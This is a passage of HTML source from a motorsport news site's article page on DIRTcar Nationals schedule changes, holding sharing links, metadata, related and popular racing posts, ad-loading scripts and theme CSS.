href="mailto:?subject=DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience&body=https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="Email" ><div class="td-social-but-icon"><i class="td-icon-mail"></i></div><div class="td-social-but-text">Email</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-copy_url" href="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" title="Copy URL" ><div class="td-social-but-icon"><div class="td-social-copy_url-check td-icon-check"></div><i class="td-icon-copy_url"></i></div><div class="td-social-but-text">Copy URL</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#" title="Print" ><div class="td-social-but-icon"><i class="td-icon-print"></i></div><div class="td-social-but-text">Print</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_bottom" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>            <!-- next prev --><div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/">Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph</a></div></div><div class="td-next-prev-separator"></div></div>            <!-- author box --><div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://www.stlracing.com/author/jdearing/">jdearing</a></span></div>            <!-- meta --><span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="jdearing"><meta itemprop="url" content="https://www.stlracing.com/author/jdearing/"></span><meta itemprop="datePublished" content="2022-11-29T13:21:58-06:00"><meta itemprop="dateModified" content="2022-11-29T13:21:58-06:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.stlracing.com/wp-content/uploads/2018/12/STLRACING-LOGO-FINAL2-300x138.png"></span><meta itemprop="name" content="STLRacing.com"></span><meta itemprop="headline " content="DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg?fit=1172%2C720&ssl=1"><meta itemprop="width" content="1172"><meta itemprop="height" content="720"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts tdi_54 td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_54" ><script>var block_tdi_54 = new tdBlock();
block_tdi_54.id = "tdi_54";
block_tdi_54.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"tdi_54","td_column_number":3,"block_type":"td_block_related_posts","live_filter_cur_post_id":72666,"live_filter_cur_post_author":"4","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_ajax_preloading":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","ajax_pagination_next_prev_swipe":"","border_top":"","css":"","tdc_css":"","tdc_css_class":"tdi_54","tdc_css_class_style":"tdi_54_rand_style"}';
block_tdi_54.td_column_number = "3";
block_tdi_54.block_type = "td_block_related_posts";
block_tdi_54.post_count = "3";
block_tdi_54.found_posts = "15665";
block_tdi_54.header_color = "";
block_tdi_54.ajax_pagination_infinite_stop = "";
block_tdi_54.max_num_pages = "5222";
tdBlocksArray.push(block_tdi_54);
</script><h4 class="td-related-title td-block-title"><a id="tdi_55" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="tdi_54" href="#">RELATED ARTICLES</a><a id="tdi_56" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="tdi_54" href="#">MORE FROM AUTHOR</a></h4><div id=tdi_54 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" class="td-image-wrap " title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph" ><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph" data-type="image_tag" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Cory-Hedgecock-112622-Chad-Wells-image.jpg?resize=218%2C150&ssl=1"  width="218" height="150" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph">Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" class="td-image-wrap " title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" ><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" data-type="image_tag" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/XOM_TylerBachman_byJacyNorgaard.jpg?resize=218%2C150&ssl=1"  width="218" height="150" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director">Xtreme Outlaw Midget Series Welcomes Bachman as Director</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" class="td-image-wrap " title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run" ><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run" data-type="image_tag" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Rocket1-Racing-112822-Josh-James-Artwork-image.jpg?resize=218%2C150&ssl=1"  width="218" height="150" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run">Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_54" data-td_block_id="tdi_54"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_54" data-td_block_id="tdi_54"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
                                </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside id="search-3" class="td_block_template_1 widget search-3 widget_search"><form method="get" class="td-search-form-widget" action="https://www.stlracing.com/">
    <div role="search">
        <input class="td-widget-search-input" type="text" value="" name="s" id="s" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="searchsubmit" value="Search" />
    </div>
</form></aside>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar tdi_57 td_block_template_1 ">

<style>
/* custom css */
.tdi_57.td-a-rec{
					text-align: center;
				}.tdi_57 .td-element-style{
					z-index: -1;
				}.tdi_57.td-a-rec-img{
				    text-align: left;
				}.tdi_57.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_57.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><script type="text/javascript">
var td_screen_width = window.innerWidth;
window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1140 ) {
			        
			        /* large monitors */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-1720844935197356");
		            adEl.setAttribute("data-ad-slot", "2678802604");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1019  && td_screen_width < 1140 ) {
			    
			        /* landscape tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-1720844935197356");
		            adEl.setAttribute("data-ad-slot", "2678802604");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 768  && td_screen_width < 1019 ) {
			    
			        /* portrait tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:200px;height:200px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-1720844935197356");
		            adEl.setAttribute("data-ad-slot", "2678802604");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width < 768 ) {
			    
			        /* Phones */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-1720844935197356");
		            adEl.setAttribute("data-ad-slot", "2678802604");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});</script>
<noscript id="td-ad-placeholder"></noscript></div>

 <!-- end A --> 

<aside id="custom_html-3" class="widget_text td_block_template_1 widget custom_html-3 widget_custom_html"><div class="textwidget custom-html-widget">
<p align="center"><img src="https://i0.wp.com/www.stlracing.com/banners/IronCountyRecycling1.gif?w=696&#038;ssl=1" border="0" data-recalc-dims="1" data-lazy-src="https://i0.wp.com/www.stlracing.com/banners/IronCountyRecycling1.gif?w=696&amp;is-pending-load=1#038;ssl=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" src="https://i0.wp.com/www.stlracing.com/banners/IronCountyRecycling1.gif?w=696&#038;ssl=1" border="0" data-recalc-dims="1"  /></noscript><a href="https://www.bessingersauto.com/appointments" target="_blank" rel="noopener"><img src="https://i0.wp.com/www.stlracing.com/banners/Bessingers_300x90_081519.jpg?w=696&#038;ssl=1" border="0" data-recalc-dims="1" data-lazy-src="https://i0.wp.com/www.stlracing.com/banners/Bessingers_300x90_081519.jpg?w=696&amp;is-pending-load=1#038;ssl=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" src="https://i0.wp.com/www.stlracing.com/banners/Bessingers_300x90_081519.jpg?w=696&#038;ssl=1" border="0" data-recalc-dims="1"  /></noscript></a></p></div></aside>
<aside id="wpp-3" class="td_block_template_1 widget wpp-3 popular-posts">
<div class="block-title"><span>Popular</span></div>

<div class="popular-posts-sr"><style>.wpp-cardview { margin-left: 0; margin-right: 0; padding: 0; } .wpp-cardview li { list-style: none; margin: 0 0 1.2em 0; padding: 0 0 1em 0; border-bottom: #ddd 1px solid; } .in-preview-mode .wpp-cardview li { margin: 0 0 1.2em 0; padding: 0 0 1em 0; } .wpp-cardview li:last-of-type, .wpp-cardview li:only-child { margin: 0; padding: 0; border-bottom: none; } .wpp-cardview .wpp-thumbnail-container { position: relative; margin-bottom: .8em; } .wpp-cardview li .wpp-thumbnail { overflow: hidden; display: block; float: none; margin: 0; width: 100%; height: auto; font-size: 0.8em; line-height: 1; background: #f0f0f0; border: none; } .wpp-cardview li a { text-decoration: none; } .wpp-cardview li a:hover { text-decoration: underline; } .wpp-cardview li .taxonomies, .wpp-cardview li .wpp-post-title { display: block; font-weight: bold; } .wpp-cardview li .taxonomies { position: absolute; bottom: 0; left: 0; padding: 1em; color: #aaa; font-size: 0.7em; line-height: 1; background: rgba(0, 0, 0, 0.5); } .wpp-cardview li .taxonomies a { color: #fff; } .wpp-cardview li .wpp-post-title { margin: 0 0 0.5em; font-size: 1.2em; line-height: 1.2; } .wpp-cardview li .wpp-excerpt { margin: 0; font-size: 0.8em; }</style>
<ul class="wpp-list wpp-cardview">
<li class=""><div class="wpp-thumbnail-container"><a href="https://www.stlracing.com/2022/11/23/heather-lynes-dedication-has-led-to-historic-feats-paving-the-way-for-others-in-the-sport/" target="_self"><img src="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165.jpg" srcset="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165.jpg, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165@1.5x.jpg 1.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165@2x.jpg 2x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165@2.5x.jpg 2.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72632-featured-320x165@3x.jpg 3x"  width="320" height="165" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a><div class="taxonomies"><a href="https://www.stlracing.com/category/dirt-late-model-news/" class="wpp-taxonomy category category-3">Dirt Late Model News </a>, <a href="https://www.stlracing.com/category/dirt-late-model-news/world-of-outlaws-late-model-series-news/" class="wpp-taxonomy category category-12">World of Outlaws Late Model Series News </a></div></div> <div class="wpp-item-data"><a href="https://www.stlracing.com/2022/11/23/heather-lynes-dedication-has-led-to-historic-feats-paving-the-way-for-others-in-the-sport/" class="wpp-post-title" target="_self">Heather Lyne’s Dedication Has Led to Historic Feats, Paving The Way For Others In The Sport</a> <p class="wpp-excerpt">HEART OF A CHAMPION-PART II: Heather Lyne's Dedication Has Led To Historic...</p></div></li>
<li class=""><div class="wpp-thumbnail-container"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" target="_self"><img src="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165.jpg" srcset="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165.jpg, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165@1.5x.jpg 1.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165@2x.jpg 2x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165@2.5x.jpg 2.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72654-featured-320x165@3x.jpg 3x"  width="320" height="165" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a><div class="taxonomies"><a href="https://www.stlracing.com/category/dirt-late-model-news/" class="wpp-taxonomy category category-3">Dirt Late Model News </a>, <a href="https://www.stlracing.com/category/dirt-late-model-news/lucas-oil-late-model-series-news/" class="wpp-taxonomy category category-9">Lucas Oil Late Model Series News </a></div></div> <div class="wpp-item-data"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" class="wpp-post-title" target="_self">Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run</a> <p class="wpp-excerpt">2023 Campaign Begins in January at Volusia Speedway Park SHINNSTON, W.Va. (...</p></div></li>
<li class=""><div class="wpp-thumbnail-container"><a href="https://www.stlracing.com/2022/11/27/grant-prix-a-dream-victory-for-jg-at-turkey-night/" target="_self"><img src="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165.jpg" srcset="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165.jpg, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165@1.5x.jpg 1.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165@2x.jpg 2x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165@2.5x.jpg 2.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72648-featured-320x165@3x.jpg 3x"  width="320" height="165" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a><div class="taxonomies"><a href="https://www.stlracing.com/category/sprint-car-news/" class="wpp-taxonomy category category-4">Sprint Car &amp; Midget News </a>, <a href="https://www.stlracing.com/category/sprint-car-news/usac-news/" class="wpp-taxonomy category category-20">USAC News </a></div></div> <div class="wpp-item-data"><a href="https://www.stlracing.com/2022/11/27/grant-prix-a-dream-victory-for-jg-at-turkey-night/" class="wpp-post-title" target="_self">Grant Prix: A Dream Victory for JG at Turkey Night</a> <p class="wpp-excerpt">By: Richie Murray – USAC Media Ventura, California (November 26, 2022)………”I...</p></div></li>
<li class=""><div class="wpp-thumbnail-container"><a href="https://www.stlracing.com/2022/11/23/matt-sheppard-to-pilot-big-frog-motorsports-super-late-model-at-upcoming-events/" target="_self"><img src="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165.jpg" srcset="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165.jpg, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165@1.5x.jpg 1.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165@2x.jpg 2x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165@2.5x.jpg 2.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72636-featured-320x165@3x.jpg 3x"  width="320" height="165" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a><div class="taxonomies"><a href="https://www.stlracing.com/category/dirt-late-model-news/" class="wpp-taxonomy category category-3">Dirt Late Model News </a></div></div> <div class="wpp-item-data"><a href="https://www.stlracing.com/2022/11/23/matt-sheppard-to-pilot-big-frog-motorsports-super-late-model-at-upcoming-events/" class="wpp-post-title" target="_self">Matt Sheppard to Pilot Big Frog Motorsports Super Late Model at Upcoming Events</a> <p class="wpp-excerpt">New York Racer Set to Make Debut at All-Tech Raceway on December 2-3 OCALA...</p></div></li>
<li class=""><div class="wpp-thumbnail-container"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" target="_self"><img src="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165.jpg" srcset="https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165.jpg, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165@1.5x.jpg 1.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165@2x.jpg 2x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165@2.5x.jpg 2.5x, https://www.stlracing.com/wp-content/uploads/wordpress-popular-posts/72658-featured-320x165@3x.jpg 3x"  width="320" height="165" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a><div class="taxonomies"><a href="https://www.stlracing.com/category/sprint-car-news/" class="wpp-taxonomy category category-4">Sprint Car &amp; Midget News </a>, <a href="https://www.stlracing.com/category/sprint-car-news/xtreme-outlaw-series/" class="wpp-taxonomy category category-2307">Xtreme Outlaw Series </a></div></div> <div class="wpp-item-data"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" class="wpp-post-title" target="_self">Xtreme Outlaw Midget Series Welcomes Bachman as Director</a> <p class="wpp-excerpt">CONCORD, NC (Nov. 28, 2022) – The Xtreme Outlaw Midget Series presented by...</p></div></li>

</ul>
</div>
</aside>
                            </div>
                        </div>
                                    </div> <!-- /.td-pb-row -->
        </div> <!-- /.td-container -->
    </div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->
    <div class="td-footer-template-wrap" style="position: relative">
                <div class="td-footer-wrap ">
            <div id="tdi_58" class="tdc-zone"><div class="tdc_zone tdi_59  wpb_row td-pb-row"  >
<style scoped>

/* custom css */
.tdi_59{
                    min-height: 0;
                }
/* inline tdc_css att */

.tdi_59{
margin-top:80px !important;
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_59{
margin-top:60px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_59{
margin-top:50px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_59{
margin-top:55px !important;
}
}

</style><div id="tdi_60" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_61  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_61,
                .tdi_61 .tdc-columns{
                    min-height: 0;
                }.tdi_61,
				.tdi_61 .tdc-columns{
				    display: block;
				}.tdi_61 .tdc-columns{
				    width: 100%;
				}
/* inline tdc_css att */

.tdi_61{
margin-bottom:70px !important;
}

.tdi_61 .td_block_wrap{ text-align:left }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_61{
margin-bottom:50px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_61{
margin-bottom:40px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_61{
margin-bottom:45px !important;
}
}

</style><div class="vc_column tdi_63  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_63{
                    vertical-align: baseline;
                }.tdi_63 > .wpb_wrapper,
				.tdi_63 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_63 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_63 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_63 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_65  td_separator_solid td_separator_center"><span style="border-color:rgba(255,252,252,0.12);border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.tdi_65{
margin-bottom:0px !important;
}

</style></div></div></div></div></div><div id="tdi_66" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_67  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_67,
                .tdi_67 .tdc-columns{
                    min-height: 0;
                }.tdi_67,
				.tdi_67 .tdc-columns{
				    display: block;
				}.tdi_67 .tdc-columns{
				    width: 100%;
				}@media (min-width: 768px) {
	                .tdi_67 {
	                    margin-left: -40px;
	                    margin-right: -40px;
	                }
	                .tdi_67 .tdc-row-video-background-error,
	                .tdi_67 .vc_column {
	                    padding-left: 40px;
	                    padding-right: 40px;
	                }
                }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
@media (min-width: 768px) {
	                .tdi_67 {
	                    margin-left: -30px;
	                    margin-right: -30px;
	                }
	                .tdi_67 .tdc-row-video-background-error,
	                .tdi_67 .vc_column {
	                    padding-left: 30px;
	                    padding-right: 30px;
	                }
                }
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
@media (min-width: 768px) {
	                .tdi_67 {
	                    margin-left: -15px;
	                    margin-right: -15px;
	                }
	                .tdi_67 .tdc-row-video-background-error,
	                .tdi_67 .vc_column {
	                    padding-left: 15px;
	                    padding-right: 15px;
	                }
                }
}
/* inline tdc_css att */

.tdi_67{
margin-bottom:40px !important;
}

.tdi_67 .td_block_wrap{ text-align:left }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_67{
margin-bottom:30px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_67{
margin-bottom:20px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_67{
margin-bottom:35px !important;
}
}

</style><div class="vc_column tdi_69  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_69{
                    vertical-align: baseline;
                }.tdi_69 > .wpb_wrapper,
				.tdi_69 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_69 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_69 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_69 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_socials tdi_70 tdm-content-horiz-center td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_70" >
<style>
.tdi_71 .tdm-social-item i{
					font-size: 15px;
					vertical-align: middle;
				
					line-height: 39px;
				}.tdi_71 .tdm-social-item i.td-icon-twitter,
				.tdi_71 .tdm-social-item i.td-icon-linkedin,
				.tdi_71 .tdm-social-item i.td-icon-pinterest,
				.tdi_71 .tdm-social-item i.td-icon-blogger,
				.tdi_71 .tdm-social-item i.td-icon-vimeo{
					font-size: 12px;
				}.tdi_71 .tdm-social-item{
					width: 39px;
					height: 39px;
				
				    margin: 0px 0px 0px 0;
				}.tdi_71 .tdm-social-item i,
				.tds-team-member2 .tdi_71.tds-social4 .tdm-social-item i{
					color: #ffa301;
				}body .tdi_71 .tdm-social-item{
				    border: 1px solid rgba(255,163,1,0.5);
				}body .tdi_71 .tdm-social-item-wrap:hover .tdm-social-item{
					border-color: #ffa301;
				}.tdi_71 .tdm-social-text{
					display: inline-block;
				
					margin-left: 12px;
				
					margin-right: 30px;
				
					color: #ffa301;
				
				    font-family:Heebo !important;font-size:13px !important;font-weight:500 !important;
				}.tdi_71 .tdm-social-item-wrap:hover .tdm-social-text{
					color: #ffa301;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_71 .tdm-social-item i{
					font-size: 14px;
					vertical-align: middle;
				
					line-height: 36.4px;
				}.tdi_71 .tdm-social-item i.td-icon-twitter,
				.tdi_71 .tdm-social-item i.td-icon-linkedin,
				.tdi_71 .tdm-social-item i.td-icon-pinterest,
				.tdi_71 .tdm-social-item i.td-icon-blogger,
				.tdi_71 .tdm-social-item i.td-icon-vimeo{
					font-size: 11.2px;
				}.tdi_71 .tdm-social-item{
					width: 36.4px;
					height: 36.4px;
				}body .tdi_71 .tdm-social-item{
				    border: 1px solid rgba(255,163,1,0.5);
				}.tdi_71 .tdm-social-text{
					margin-left: 10px;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_71 .tdm-social-item i{
					font-size: 13px;
					vertical-align: middle;
				
					line-height: 32.5px;
				}.tdi_71 .tdm-social-item i.td-icon-twitter,
				.tdi_71 .tdm-social-item i.td-icon-linkedin,
				.tdi_71 .tdm-social-item i.td-icon-pinterest,
				.tdi_71 .tdm-social-item i.td-icon-blogger,
				.tdi_71 .tdm-social-item i.td-icon-vimeo{
					font-size: 10.4px;
				}.tdi_71 .tdm-social-item{
					width: 32.5px;
					height: 32.5px;
				}body .tdi_71 .tdm-social-item{
